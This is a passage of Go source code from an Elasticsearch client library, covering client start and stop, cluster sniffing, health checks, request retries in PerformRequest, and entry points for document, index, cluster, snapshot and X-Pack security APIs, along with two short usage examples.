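// PerformRequest. The header name and value below are made-up examples.
func exampleSetHeadersUsage() (*Client, error) {
    headers := http.Header{
        "X-Caller": []string{"my-service"}, // hypothetical header
    }
    return NewClient(SetHeaders(headers))
}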
// String returns a string representation of the client status.
func (c *Client) String() string {
c.connsMu.Lock()
conns := c.conns
c.connsMu.Unlock()
var buf bytes.Buffer
for i, conn := range conns {
if i > 0 {
buf.WriteString(", ")
}
buf.WriteString(conn.String())
}
return buf.String()
}
// IsRunning returns true if the background processes of the client are
// running, false otherwise.
func (c *Client) IsRunning() bool {
c.mu.RLock()
defer c.mu.RUnlock()
return c.running
}
// Start starts the background processes like sniffing the cluster and
// periodic health checks. You don't need to run Start when creating a
// client with NewClient; the background processes are run by default.
//
// If the background processes are already running, this is a no-op.
func (c *Client) Start() {
c.mu.RLock()
if c.running {
c.mu.RUnlock()
return
}
c.mu.RUnlock()
if c.snifferEnabled {
go c.sniffer()
}
if c.healthcheckEnabled {
go c.healthchecker()
}
c.mu.Lock()
c.running = true
c.mu.Unlock()
c.infof("elastic: client started")
}
// Stop stops the background processes that the client is running,
// i.e. sniffing the cluster periodically and running health checks
// on the nodes.
//
// If the background processes are not running, this is a no-op.
func (c *Client) Stop() {
c.mu.RLock()
if !c.running {
c.mu.RUnlock()
return
}
c.mu.RUnlock()
if c.healthcheckEnabled {
c.healthcheckStop <- true
<-c.healthcheckStop
}
if c.snifferEnabled {
c.snifferStop <- true
<-c.snifferStop
}
c.mu.Lock()
c.running = false
c.mu.Unlock()
c.infof("elastic: client stopped")
}
// errorf logs to the error log.
func (c *Client) errorf(format string, args ...interface{}) {
if c.errorlog != nil {
c.errorlog.Printf(format, args...)
}
}
// infof logs informational messages.
func (c *Client) infof(format string, args ...interface{}) {
if c.infolog != nil {
c.infolog.Printf(format, args...)
}
}
// tracef logs to the trace log.
func (c *Client) tracef(format string, args ...interface{}) {
if c.tracelog != nil {
c.tracelog.Printf(format, args...)
}
}
// dumpRequest dumps the given HTTP request to the trace log.
func (c *Client) dumpRequest(r *http.Request) {
if c.tracelog != nil {
out, err := httputil.DumpRequestOut(r, true)
if err == nil {
c.tracef("%s\n", string(out))
}
}
}
// dumpResponse dumps the given HTTP response to the trace log.
func (c *Client) dumpResponse(resp *http.Response) {
if c.tracelog != nil {
out, err := httputil.DumpResponse(resp, true)
if err == nil {
c.tracef("%s\n", string(out))
}
}
}
// sniffer periodically runs sniff.
func (c *Client) sniffer() {
c.mu.RLock()
timeout := c.snifferTimeout
interval := c.snifferInterval
c.mu.RUnlock()
ticker := time.NewTicker(interval)
defer ticker.Stop()
for {
select {
case <-c.snifferStop:
// we are asked to stop, so we signal back that we're stopping now
c.snifferStop <- true
return
case <-ticker.C:
c.sniff(context.Background(), timeout)
}
}
}
// sniff uses the Nodes Info API to return the list of nodes in the cluster.
// It uses the list of URLs passed on startup plus the list of URLs found
// by the preceding sniffing process (if sniffing is enabled).
//
// If sniffing is disabled, this is a no-op.
func (c *Client) sniff(parentCtx context.Context, timeout time.Duration) error {
c.mu.RLock()
if !c.snifferEnabled {
c.mu.RUnlock()
return nil
}
// Use all available URLs provided to sniff the cluster.
var urls []string
urlsMap := make(map[string]bool)
// Add all URLs provided on startup
for _, url := range c.urls {
urlsMap[url] = true
urls = append(urls, url)
}
c.mu.RUnlock()
// Add all URLs found by sniffing
c.connsMu.RLock()
for _, conn := range c.conns {
if !conn.IsDead() {
url := conn.URL()
if _, found := urlsMap[url]; !found {
urls = append(urls, url)
}
}
}
c.connsMu.RUnlock()
if len(urls) == 0 {
return errors.Wrap(ErrNoClient, "no URLs found")
}
// Start sniffing on all found URLs
ch := make(chan []*conn, len(urls))
ctx, cancel := context.WithTimeout(parentCtx, timeout)
defer cancel()
for _, url := range urls {
go func(url string) { ch <- c.sniffNode(ctx, url) }(url)
}
// Wait for the results to come back, or the process times out.
for {
select {
case conns := <-ch:
if len(conns) > 0 {
c.updateConns(conns)
return nil
}
case <-ctx.Done():
if err := ctx.Err(); err != nil {
switch {
case IsContextErr(err):
return err
}
return errors.Wrapf(ErrNoClient, "sniff timeout: %v", err)
}
// We get here if no cluster responds in time
return errors.Wrap(ErrNoClient, "sniff timeout")
}
}
}
// sniffNode sniffs a single node. This method is run as a goroutine
// in sniff. If successful, it returns the list of node URLs extracted
// from the result of calling Nodes Info API. Otherwise, an empty array
// is returned.
func (c *Client) sniffNode(ctx context.Context, url string) []*conn {
var nodes []*conn
// Call the Nodes Info API at /_nodes/http
req, err := NewRequest("GET", url+"/_nodes/http")
if err != nil {
return nodes
}
c.mu.RLock()
if c.basicAuth {
req.SetBasicAuth(c.basicAuthUsername, c.basicAuthPassword)
}
c.mu.RUnlock()
res, err := c.c.Do((*http.Request)(req).WithContext(ctx))
if err != nil {
return nodes
}
defer res.Body.Close()
var info NodesInfoResponse
if err := json.NewDecoder(res.Body).Decode(&info); err == nil {
if len(info.Nodes) > 0 {
for nodeID, node := range info.Nodes {
if c.snifferCallback(node) {
if node.HTTP != nil && len(node.HTTP.PublishAddress) > 0 {
url := c.extractHostname(c.scheme, node.HTTP.PublishAddress)
if url != "" {
nodes = append(nodes, newConn(nodeID, url))
}
}
}
}
}
}
return nodes
}
// extractHostname returns the URL from the http.publish_address setting.
func (c *Client) extractHostname(scheme, address string) string {
var (
host string
port string
addrs = strings.Split(address, "/")
ports = strings.Split(address, ":")
)
if len(addrs) > 1 {
host = addrs[0]
} else {
host = strings.Split(addrs[0], ":")[0]
}
port = ports[len(ports)-1]
return fmt.Sprintf("%s://%s:%s", scheme, host, port)
}
// updateConns updates the client's connections with new information
// gathered by a sniff operation.
func (c *Client) updateConns(conns []*conn) {
c.connsMu.Lock()
// Build up new connections:
// If we find an existing connection, use that (including no. of failures etc.).
// If we find a new connection, add it.
var newConns []*conn
for _, conn := range conns {
var found bool
for _, oldConn := range c.conns {
// Notice that e.g. in a Kubernetes cluster the NodeID might be
// stable while the URL has changed.
if oldConn.NodeID() == conn.NodeID() && oldConn.URL() == conn.URL() {
// Take over the old connection
newConns = append(newConns, oldConn)
found = true
break
}
}
if !found {
// New connection didn't exist, so add it to our list of new conns.
c.infof("elastic: %s joined the cluster", conn.URL())
newConns = append(newConns, conn)
}
}
c.conns = newConns
c.cindex = -1
c.connsMu.Unlock()
}
// healthchecker periodically runs healthcheck.
func (c *Client) healthchecker() {
c.mu.RLock()
timeout := c.healthcheckTimeout
interval := c.healthcheckInterval
c.mu.RUnlock()
ticker := time.NewTicker(interval)
defer ticker.Stop()
for {
select {
case <-c.healthcheckStop:
// we are asked to stop, so we signal back that we're stopping now
c.healthcheckStop <- true
return
case <-ticker.C:
c.healthcheck(context.Background(), timeout, false)
}
}
}
// healthcheck does a health check on all nodes in the cluster. Depending on
// the node state, it marks connections as dead, sets them alive etc.
// If healthchecks are disabled and force is false, this is a no-op.
// The timeout specifies how long to wait for a response from Elasticsearch.
func (c *Client) healthcheck(parentCtx context.Context, timeout time.Duration, force bool) {
c.mu.RLock()
if !c.healthcheckEnabled && !force {
c.mu.RUnlock()
return
}
basicAuth := c.basicAuth
basicAuthUsername := c.basicAuthUsername
basicAuthPassword := c.basicAuthPassword
c.mu.RUnlock()
c.connsMu.RLock()
conns := c.conns
c.connsMu.RUnlock()
for _, conn := range conns {
// Run the HEAD request against ES with a timeout
ctx, cancel := context.WithTimeout(parentCtx, timeout)
defer cancel()
// Goroutine executes the HTTP request, returns an error and sets status
var status int
errc := make(chan error, 1)
go func(url string) {
req, err := NewRequest("HEAD", url)
if err != nil {
errc <- err
return
}
if basicAuth {
req.SetBasicAuth(basicAuthUsername, basicAuthPassword)
}
res, err := c.c.Do((*http.Request)(req).WithContext(ctx))
if res != nil {
status = res.StatusCode
if res.Body != nil {
res.Body.Close()
}
}
errc <- err
}(conn.URL())
// Wait for the Goroutine (or its timeout)
select {
case <-ctx.Done(): // timeout
c.errorf("elastic: %s is dead", conn.URL())
conn.MarkAsDead()
case err := <-errc:
if err != nil {
c.errorf("elastic: %s is dead", conn.URL())
conn.MarkAsDead()
break
}
if status >= 200 && status < 300 {
conn.MarkAsAlive()
} else {
conn.MarkAsDead()
c.errorf("elastic: %s is dead [status=%d]", conn.URL(), status)
}
}
}
}
// startupHealthcheck is used at startup to check if the server is available
// at all.
func (c *Client) startupHealthcheck(parentCtx context.Context, timeout time.Duration) error {
c.mu.Lock()
urls := c.urls
basicAuth := c.basicAuth
basicAuthUsername := c.basicAuthUsername
basicAuthPassword := c.basicAuthPassword
c.mu.Unlock()
// If we don't get a connection after "timeout", we bail.
var lastErr error
start := time.Now()
done := false
for !done {
for _, url := range urls {
req, err := http.NewRequest("HEAD", url, nil)
if err != nil {
return err
}
if basicAuth {
req.SetBasicAuth(basicAuthUsername, basicAuthPassword)
}
ctx, cancel := context.WithTimeout(parentCtx, timeout)
defer cancel()
req = req.WithContext(ctx)
res, err := c.c.Do(req)
if err == nil && res != nil && res.StatusCode >= 200 && res.StatusCode < 300 {
return nil
} else if err != nil {
lastErr = err
}
}
select {
case <-parentCtx.Done():
lastErr = parentCtx.Err()
done = true
case <-time.After(1 * time.Second):
if time.Since(start) > timeout {
done = true
}
}
}
if lastErr != nil {
if IsContextErr(lastErr) {
return lastErr
}
return errors.Wrapf(ErrNoClient, "health check timeout: %v", lastErr)
}
return errors.Wrap(ErrNoClient, "health check timeout")
}
// next returns the next available connection, or ErrNoClient.
func (c *Client) next() (*conn, error) {
// We do round-robin here.
// TODO(oe) This should be a pluggable strategy, like the Selector in the official clients.
c.connsMu.Lock()
defer c.connsMu.Unlock()
i := 0
numConns := len(c.conns)
for {
i++
if i > numConns {
break // we visited all conns: they all seem to be dead
}
c.cindex++
if c.cindex >= numConns {
c.cindex = 0
}
conn := c.conns[c.cindex]
if !conn.IsDead() {
return conn, nil
}
}
// We have a deadlock here: All nodes are marked as dead.
// If sniffing is disabled, connections will never be marked alive again,
// so in that case we resurrect them here.
// They'll then be picked up in the next call to PerformRequest.
if !c.snifferEnabled {
c.errorf("elastic: all %d nodes marked as dead; resurrecting them to prevent deadlock", len(c.conns))
for _, conn := range c.conns {
conn.MarkAsAlive()
}
}
// We tried hard, but there is no node available
return nil, errors.Wrap(ErrNoClient, "no available connection")
}
// mustActiveConn returns nil if there is an active connection,
// otherwise ErrNoClient is returned.
func (c *Client) mustActiveConn() error {
c.connsMu.Lock()
defer c.connsMu.Unlock()
for _, c := range c.conns {
if !c.IsDead() {
return nil
}
}
return errors.Wrap(ErrNoClient, "no active connection found")
}
// -- PerformRequest --
// PerformRequestOptions must be passed into PerformRequest.
type PerformRequestOptions struct {
Method string
Path string
Params url.Values
Body interface{}
ContentType string
IgnoreErrors []int
Retrier Retrier
Headers http.Header
MaxResponseSize int64
}
// PerformRequest does an HTTP request to Elasticsearch.
// It returns a response (which might be nil) and an error on failure.
//
// Optionally, a list of HTTP error codes to ignore can be passed.
// This is necessary for services that expect e.g. HTTP status 404 as a
// valid outcome (Exists, IndicesExists, IndicesTypeExists).
func (c *Client) PerformRequest(ctx context.Context, opt PerformRequestOptions) (*Response, error) {
start := time.Now().UTC()
c.mu.RLock()
timeout := c.healthcheckTimeout
basicAuth := c.basicAuth
basicAuthUsername := c.basicAuthUsername
basicAuthPassword := c.basicAuthPassword
sendGetBodyAs := c.sendGetBodyAs
gzipEnabled := c.gzipEnabled
healthcheckEnabled := c.healthcheckEnabled
retrier := c.retrier
if opt.Retrier != nil {
retrier = opt.Retrier
}
defaultHeaders := c.headers
c.mu.RUnlock()
var err error
var conn *conn
var req *Request
var resp *Response
var retried bool
var n int
// Change method if sendGetBodyAs is specified.
if opt.Method == "GET" && opt.Body != nil && sendGetBodyAs != "GET" {
opt.Method = sendGetBodyAs
}
for {
pathWithParams := opt.Path
if len(opt.Params) > 0 {
pathWithParams += "?" + opt.Params.Encode()
}
// Get a connection
conn, err = c.next()
if errors.Cause(err) == ErrNoClient {
n++
if !retried {
// Force a healthcheck as all connections seem to be dead.
c.healthcheck(ctx, timeout, false)
if healthcheckEnabled {
retried = true
continue
}
}
wait, ok, rerr := retrier.Retry(ctx, n, nil, nil, err)
if rerr != nil {
return nil, rerr
}
if !ok {
return nil, err
}
retried = true
time.Sleep(wait)
continue // try again
}
if err != nil {
c.errorf("elastic: cannot get connection from pool")
return nil, err
}
req, err = NewRequest(opt.Method, conn.URL()+pathWithParams)
if err != nil {
c.errorf("elastic: cannot create request for %s %s: %v", strings.ToUpper(opt.Method), conn.URL()+pathWithParams, err)
return nil, err
}
if basicAuth {
req.SetBasicAuth(basicAuthUsername, basicAuthPassword)
}
if opt.ContentType != "" {
req.Header.Set("Content-Type", opt.ContentType)
}
if len(opt.Headers) > 0 {
for key, value := range opt.Headers {
for _, v := range value {
req.Header.Add(key, v)
}
}
}
if len(defaultHeaders) > 0 {
for key, value := range defaultHeaders {
for _, v := range value {
req.Header.Add(key, v)
}
}
}
// Set body
if opt.Body != nil {
err = req.SetBody(opt.Body, gzipEnabled)
if err != nil {
c.errorf("elastic: couldn't set body %+v for request: %v", opt.Body, err)
return nil, err
}
}
// Tracing
c.dumpRequest((*http.Request)(req))
// Get response
res, err := c.c.Do((*http.Request)(req).WithContext(ctx))
if IsContextErr(err) {
// Proceed, but don't mark the node as dead
return nil, err
}
if err != nil {
n++
wait, ok, rerr := retrier.Retry(ctx, n, (*http.Request)(req), res, err)
if rerr != nil {
c.errorf("elastic: %s is dead", conn.URL())
conn.MarkAsDead()
return nil, rerr
}
if !ok {
c.errorf("elastic: %s is dead", conn.URL())
conn.MarkAsDead()
return nil, err
}
retried = true
time.Sleep(wait)
continue // try again
}
defer res.Body.Close()
// Tracing
c.dumpResponse(res)
// Log deprecation warnings as errors
if len(res.Header["Warning"]) > 0 {
c.deprecationlog((*http.Request)(req), res)
for _, warning := range res.Header["Warning"] {
c.errorf("Deprecation warning: %s", warning)
}
}
// Check for errors
if err := checkResponse((*http.Request)(req), res, opt.IgnoreErrors...); err != nil {
// The HTTP round-trip itself succeeded, so we don't retry on an error response.
// We still try to return a response.
resp, _ = c.newResponse(res, opt.MaxResponseSize)
return resp, err
}
// We successfully made a request with this connection
conn.MarkAsHealthy()
resp, err = c.newResponse(res, opt.MaxResponseSize)
if err != nil {
return nil, err
}
break
}
duration := time.Now().UTC().Sub(start)
c.infof("%s %s [status:%d, request:%.3fs]",
strings.ToUpper(opt.Method),
req.URL,
resp.StatusCode,
float64(int64(duration/time.Millisecond))/1000)
return resp, nil
}
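// examplePerformRequestUsage is an illustrative sketch (not part of the
// upstream API) of calling PerformRequest directly for an endpoint without a
// dedicated service. The path and error handling are minimal examples.
func examplePerformRequestUsage(ctx context.Context, client *Client) error {
    res, err := client.PerformRequest(ctx, PerformRequestOptions{
        Method: "GET",
        Path:   "/", // root info endpoint
    })
    if err != nil {
        return err
    }
    // res.StatusCode carries the HTTP status reported by Elasticsearch.
    _ = res
    return nil
}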
// -- Document APIs --
// Index a document.
func (c *Client) Index() *IndexService {
return NewIndexService(c)
}
// Get a document.
func (c *Client) Get() *GetService {
return NewGetService(c)
}
// MultiGet retrieves multiple documents in one roundtrip.
func (c *Client) MultiGet() *MgetService {
return NewMgetService(c)
}
// Mget retrieves multiple documents in one roundtrip.
func (c *Client) Mget() *MgetService {
return NewMgetService(c)
}
// Delete a document.
func (c *Client) Delete() *DeleteService {
return NewDeleteService(c)
}
// DeleteByQuery deletes documents as found by a query.
func (c *Client) DeleteByQuery(indices ...string) *DeleteByQueryService {
return NewDeleteByQueryService(c).Index(indices...)
}
// Update a document.
func (c *Client) Update() *UpdateService {
return NewUpdateService(c)
}
// UpdateByQuery performs an update on a set of documents.
func (c *Client) UpdateByQuery(indices ...string) *UpdateByQueryService {
return NewUpdateByQueryService(c).Index(indices...)
}
// Bulk is the entry point to mass insert/update/delete documents.
func (c *Client) Bulk() *BulkService {
return NewBulkService(c)
}
// BulkProcessor allows setting up a concurrent processor of bulk requests.
func (c *Client) BulkProcessor() *BulkProcessorService {
return NewBulkProcessorService(c)
}
// Reindex copies data from a source index into a destination index.
//
// See https://www.elastic.co/guide/en/elasticsearch/reference/7.0/docs-reindex.html
// for details on the Reindex API.
func (c *Client) Reindex() *ReindexService {
return NewReindexService(c)
}
// TermVectors returns information and statistics on terms in the fields
// of a particular document.
func (c *Client) TermVectors(index string) *TermvectorsService {
builder := NewTermvectorsService(c)
builder = builder.Index(index)
return builder
}
// MultiTermVectors returns information and statistics on terms in the fields
// of multiple documents.
func (c *Client) MultiTermVectors() *MultiTermvectorService {
return NewMultiTermvectorService(c)
}
// -- Search APIs --
// Search is the entry point for searches.
func (c *Client) Search(indices ...string) *SearchService {
return NewSearchService(c).Index(indices...)
}
// MultiSearch is the entry point for multi searches.
func (c *Client) MultiSearch() *MultiSearchService {
return NewMultiSearchService(c)
}
// Count documents.
func (c *Client) Count(indices ...string) *CountService {
return NewCountService(c).Index(indices...)
}
// Explain computes a score explanation for a query and a specific document.
func (c *Client) Explain(index, typ, id string) *ExplainService {
return NewExplainService(c).Index(index).Type(typ).Id(id)
}
// TODO Search Template
// TODO Search Exists API
// Validate allows a user to validate a potentially expensive query without executing it.
func (c *Client) Validate(indices ...string) *ValidateService {
return NewValidateService(c).Index(indices...)
}
// SearchShards returns statistical information about nodes and shards.
func (c *Client) SearchShards(indices ...string) *SearchShardsService {
return NewSearchShardsService(c).Index(indices...)
}
// FieldCaps returns statistical information about fields in indices.
func (c *Client) FieldCaps(indices ...string) *FieldCapsService {
return NewFieldCapsService(c).Index(indices...)
}
// Exists checks if a document exists.
func (c *Client) Exists() *ExistsService {
return NewExistsService(c)
}
// Scroll through documents. Use this to efficiently scroll through results
// while returning the results to a client.
func (c *Client) Scroll(indices ...string) *ScrollService {
return NewScrollService(c).Index(indices...)
}
// ClearScroll can be used to clear search contexts manually.
func (c *Client) ClearScroll(scrollIds ...string) *ClearScrollService {
return NewClearScrollService(c).ScrollId(scrollIds...)
}
// -- Indices APIs --
// CreateIndex returns a service to create a new index.
func (c *Client) CreateIndex(name string) *IndicesCreateService {
return NewIndicesCreateService(c).Index(name)
}
// DeleteIndex returns a service to delete an index.
func (c *Client) DeleteIndex(indices ...string) *IndicesDeleteService {
return NewIndicesDeleteService(c).Index(indices)
}
// IndexExists allows you to check if an index exists.
func (c *Client) IndexExists(indices ...string) *IndicesExistsService {
return NewIndicesExistsService(c).Index(indices)
}
// ShrinkIndex returns a service to shrink one index into another.
func (c *Client) ShrinkIndex(source, target string) *IndicesShrinkService {
return NewIndicesShrinkService(c).Source(source).Target(target)
}
// RolloverIndex rolls an alias over to a new index when the existing index
// is considered to be too large or too old.
func (c *Client) RolloverIndex(alias string) *IndicesRolloverService {
return NewIndicesRolloverService(c).Alias(alias)
}
// IndexStats provides statistics on different operations happening
// in one or more indices.
func (c *Client) IndexStats(indices ...string) *IndicesStatsService {
return NewIndicesStatsService(c).Index(indices...)
}
// OpenIndex opens an index.
func (c *Client) OpenIndex(name string) *IndicesOpenService {
return NewIndicesOpenService(c).Index(name)
}
// CloseIndex closes an index.
func (c *Client) CloseIndex(name string) *IndicesCloseService {
return NewIndicesCloseService(c).Index(name)
}
// FreezeIndex freezes an index.
func (c *Client) FreezeIndex(name string) *IndicesFreezeService {
return NewIndicesFreezeService(c).Index(name)
}
// UnfreezeIndex unfreezes an index.
func (c *Client) UnfreezeIndex(name string) *IndicesUnfreezeService {
return NewIndicesUnfreezeService(c).Index(name)
}
// IndexGet retrieves information about one or more indices.
// IndexGet is only available for Elasticsearch 1.4 or later.
func (c *Client) IndexGet(indices ...string) *IndicesGetService {
return NewIndicesGetService(c).Index(indices...)
}
// IndexGetSettings retrieves settings of all, one or more indices.
func (c *Client) IndexGetSettings(indices ...string) *IndicesGetSettingsService {
return NewIndicesGetSettingsService(c).Index(indices...)
}
// IndexPutSettings sets settings for all, one or more indices.
func (c *Client) IndexPutSettings(indices ...string) *IndicesPutSettingsService {
return NewIndicesPutSettingsService(c).Index(indices...)
}
// IndexSegments retrieves low level segment information for all, one or more indices.
func (c *Client) IndexSegments(indices ...string) *IndicesSegmentsService {
return NewIndicesSegmentsService(c).Index(indices...)
}
// IndexAnalyze performs the analysis process on a text and returns the
// token breakdown of the text.
func (c *Client) IndexAnalyze() *IndicesAnalyzeService {
return NewIndicesAnalyzeService(c)
}
// Forcemerge optimizes one or more indices.
// It replaces the deprecated Optimize API.
func (c *Client) Forcemerge(indices ...string) *IndicesForcemergeService {
return NewIndicesForcemergeService(c).Index(indices...)
}
// Refresh asks Elasticsearch to refresh one or more indices.
func (c *Client) Refresh(indices ...string) *RefreshService {
return NewRefreshService(c).Index(indices...)
}
// Flush asks Elasticsearch to free memory from the index and
// flush data to disk.
func (c *Client) Flush(indices ...string) *IndicesFlushService {
return NewIndicesFlushService(c).Index(indices...)
}
// SyncedFlush performs a synced flush.
//
// See https://www.elastic.co/guide/en/elasticsearch/reference/7.0/indices-synced-flush.html
// for more details on synced flushes and how they differ from a normal
// Flush.
func (c *Client) SyncedFlush(indices ...string) *IndicesSyncedFlushService {
return NewIndicesSyncedFlushService(c).Index(indices...)
}
// ClearCache clears caches for one or more indices.
func (c *Client) ClearCache(indices ...string) *IndicesClearCacheService {
return NewIndicesClearCacheService(c).Index(indices...)
}
// Alias enables the caller to add and/or remove aliases.
func (c *Client) Alias() *AliasService {
return NewAliasService(c)
}
// Aliases returns aliases by index name(s).
func (c *Client) Aliases() *AliasesService {
return NewAliasesService(c)
}
// IndexGetTemplate gets an index template.
// Use XXXTemplate funcs to manage search templates.
func (c *Client) IndexGetTemplate(names ...string) *IndicesGetTemplateService {
return NewIndicesGetTemplateService(c).Name(names...)
}
// IndexTemplateExists checks whether an index template exists.
// Use XXXTemplate funcs to manage search templates.
func (c *Client) IndexTemplateExists(name string) *IndicesExistsTemplateService {
return NewIndicesExistsTemplateService(c).Name(name)
}
// IndexPutTemplate creates or updates an index template.
// Use XXXTemplate funcs to manage search templates.
func (c *Client) IndexPutTemplate(name string) *IndicesPutTemplateService {
return NewIndicesPutTemplateService(c).Name(name)
}
// IndexDeleteTemplate deletes an index template.
// Use XXXTemplate funcs to manage search templates.
func (c *Client) IndexDeleteTemplate(name string) *IndicesDeleteTemplateService {
return NewIndicesDeleteTemplateService(c).Name(name)
}
// GetMapping gets a mapping.
func (c *Client) GetMapping() *IndicesGetMappingService {
return NewIndicesGetMappingService(c)
}
// PutMapping registers a mapping.
func (c *Client) PutMapping() *IndicesPutMappingService {
return NewIndicesPutMappingService(c)
}
// GetFieldMapping gets mapping for fields.
func (c *Client) GetFieldMapping() *IndicesGetFieldMappingService {
return NewIndicesGetFieldMappingService(c)
}
// -- cat APIs --
// TODO cat fielddata
// TODO cat master
// TODO cat nodes
// TODO cat pending tasks
// TODO cat plugins
// TODO cat recovery
// TODO cat thread pool
// TODO cat shards
// TODO cat segments
// CatAliases returns information about aliases.
func (c *Client) CatAliases() *CatAliasesService {
return NewCatAliasesService(c)
}
// CatAllocation returns information about the allocation across nodes.
func (c *Client) CatAllocation() *CatAllocationService {
return NewCatAllocationService(c)
}
// CatCount returns document counts for indices.
func (c *Client) CatCount() *CatCountService {
return NewCatCountService(c)
}
// CatHealth returns information about cluster health.
func (c *Client) CatHealth() *CatHealthService {
return NewCatHealthService(c)
}
// CatIndices returns information about indices.
func (c *Client) CatIndices() *CatIndicesService {
return NewCatIndicesService(c)
}
// -- Ingest APIs --
// IngestPutPipeline adds pipelines and updates existing pipelines in
// the cluster.
func (c *Client) IngestPutPipeline(id string) *IngestPutPipelineService {
return NewIngestPutPipelineService(c).Id(id)
}
// IngestGetPipeline returns pipelines based on ID.
func (c *Client) IngestGetPipeline(ids ...string) *IngestGetPipelineService {
return NewIngestGetPipelineService(c).Id(ids...)
}
// IngestDeletePipeline deletes a pipeline by ID.
func (c *Client) IngestDeletePipeline(id string) *IngestDeletePipelineService {
return NewIngestDeletePipelineService(c).Id(id)
}
// IngestSimulatePipeline executes a specific pipeline against the set of
// documents provided in the body of the request.
func (c *Client) IngestSimulatePipeline() *IngestSimulatePipelineService {
return NewIngestSimulatePipelineService(c)
}
// -- Cluster APIs --
// ClusterHealth retrieves the health of the cluster.
func (c *Client) ClusterHealth() *ClusterHealthService {
return NewClusterHealthService(c)
}
// ClusterReroute allows for manual changes to the allocation of
// individual shards in the cluster.
func (c *Client) ClusterReroute() *ClusterRerouteService {
return NewClusterRerouteService(c)
}
// ClusterState retrieves the state of the cluster.
func (c *Client) ClusterState() *ClusterStateService {
return NewClusterStateService(c)
}
// ClusterStats retrieves cluster statistics.
func (c *Client) ClusterStats() *ClusterStatsService {
return NewClusterStatsService(c)
}
// NodesInfo retrieves information about one, several, or all nodes in the cluster.
func (c *Client) NodesInfo() *NodesInfoService {
return NewNodesInfoService(c)
}
// NodesStats retrieves statistics for one, several, or all nodes in the cluster.
func (c *Client) NodesStats() *NodesStatsService {
return NewNodesStatsService(c)
}
// TasksCancel cancels tasks running on the specified nodes.
func (c *Client) TasksCancel() *TasksCancelService {
return NewTasksCancelService(c)
}
// TasksList retrieves the list of tasks running on the specified nodes.
func (c *Client) TasksList() *TasksListService {
return NewTasksListService(c)
}
// TasksGetTask retrieves a task running on the cluster.
func (c *Client) TasksGetTask() *TasksGetTaskService {
return NewTasksGetTaskService(c)
}
// TODO Pending cluster tasks
// TODO Cluster Reroute
// TODO Cluster Update Settings
// TODO Nodes Stats
// TODO Nodes hot_threads
// -- Snapshot and Restore --
// SnapshotStatus returns information about the status of a snapshot.
func (c *Client) SnapshotStatus() *SnapshotStatusService {
return NewSnapshotStatusService(c)
}
// SnapshotCreate creates a snapshot.
func (c *Client) SnapshotCreate(repository string, snapshot string) *SnapshotCreateService {
return NewSnapshotCreateService(c).Repository(repository).Snapshot(snapshot)
}
// SnapshotCreateRepository creates or updates a snapshot repository.
func (c *Client) SnapshotCreateRepository(repository string) *SnapshotCreateRepositoryService {
return NewSnapshotCreateRepositoryService(c).Repository(repository)
}
// SnapshotDelete deletes a snapshot in a snapshot repository.
func (c *Client) SnapshotDelete(repository string, snapshot string) *SnapshotDeleteService {
return NewSnapshotDeleteService(c).Repository(repository).Snapshot(snapshot)
}
// SnapshotDeleteRepository deletes a snapshot repository.
func (c *Client) SnapshotDeleteRepository(repositories ...string) *SnapshotDeleteRepositoryService {
return NewSnapshotDeleteRepositoryService(c).Repository(repositories...)
}
// SnapshotGetRepository gets a snapshot repository.
func (c *Client) SnapshotGetRepository(repositories ...string) *SnapshotGetRepositoryService {
return NewSnapshotGetRepositoryService(c).Repository(repositories...)
}
// SnapshotGet lists the snapshots in a repository.
func (c *Client) SnapshotGet(repository string) *SnapshotGetService {
return NewSnapshotGetService(c).Repository(repository)
}
// SnapshotVerifyRepository verifies a snapshot repository.
func (c *Client) SnapshotVerifyRepository(repository string) *SnapshotVerifyRepositoryService {
return NewSnapshotVerifyRepositoryService(c).Repository(repository)
}
// SnapshotRestore restores the specified indices from a given snapshot.
func (c *Client) SnapshotRestore(repository string, snapshot string) *SnapshotRestoreService {
return NewSnapshotRestoreService(c).Repository(repository).Snapshot(snapshot)
}
// -- Scripting APIs --
// GetScript reads a stored script in Elasticsearch.
// Use PutScript for storing a script.
func (c *Client) GetScript() *GetScriptService {
return NewGetScriptService(c)
}
// PutScript allows saving a stored script in Elasticsearch.
func (c *Client) PutScript() *PutScriptService {
return NewPutScriptService(c)
}
// DeleteScript allows removing a stored script from Elasticsearch.
func (c *Client) DeleteScript() *DeleteScriptService {
return NewDeleteScriptService(c)
}
// -- X-Pack General --
// XPackInfo gets information on the xpack plugins enabled on the cluster.
func (c *Client) XPackInfo() *XPackInfoService {
return NewXPackInfoService(c)
}
// -- X-Pack Index Lifecycle Management --
// XPackIlmPutLifecycle adds or modifies an ilm policy.
func (c *Client) XPackIlmPutLifecycle() *XPackIlmPutLifecycleService {
return NewXPackIlmPutLifecycleService(c)
}
// XPackIlmGetLifecycle gets an ilm policy.
func (c *Client) XPackIlmGetLifecycle() *XPackIlmGetLifecycleService {
return NewXPackIlmGetLifecycleService(c)
}
// XPackIlmDeleteLifecycle deletes an ilm policy.
func (c *Client) XPackIlmDeleteLifecycle() *XPackIlmDeleteLifecycleService {
return NewXPackIlmDeleteLifecycleService(c)
}
// -- X-Pack Security --
// XPackSecurityGetRoleMapping gets a role mapping.
func (c *Client) XPackSecurityGetRoleMapping(roleMappingName string) *XPackSecurityGetRoleMappingService {
return NewXPackSecurityGetRoleMappingService(c).Name(roleMappingName)
}
// XPackSecurityPutRoleMapping adds a role mapping.
func (c *Client) XPackSecurityPutRoleMapping(roleMappingName string) *XPackSecurityPutRoleMappingService {
return NewXPackSecurityPutRoleMappingService(c).Name(roleMappingName)
}
// XPackSecurityDeleteRoleMapping deletes a role mapping.
func (c *Client) XPackSecurityDeleteRoleMapping(roleMappingName string) *XPackSecurityDeleteRoleMappingService {
return NewXPackSecurityDeleteRoleMappingService(c).Name(roleMappingName)
}
// XPackSecurityGetRole gets a role.
func (c *Client) XPackSecurityGetRole(roleName string) *XPackSecurityGetRoleService {
return NewXPackSecurityGetRoleService(c).Name(roleName)
}
// XPackSecurityPutRole adds a role.
func (c *Client) XPackSecurityPutRole(roleName string) *XPackSecurityPutRoleService {
return NewXPackSecurityPutRoleService(c).Name(roleName)
}
// XPackSecurityDeleteRole deletes a role.
func (c *Client) XPackSecurityDeleteRole(roleName string) *XPackSecurityDeleteRoleService {
return NewXPackSecurityDeleteRoleService(c).Name(roleName)
}
// TODO: Clear role cache API
// https://www.elastic.co/guide/en/elasticsearch/reference/7.0/security-api-clear-role-cache.html
// XPackSecurityChangePassword changes the password of users in the native realm.
func (c *Client) XPackSecurityChangePassword(username string) *XPackSecurityChangePasswordService {
return NewXPackSecurityChangePasswordService(c).Username(username)
}
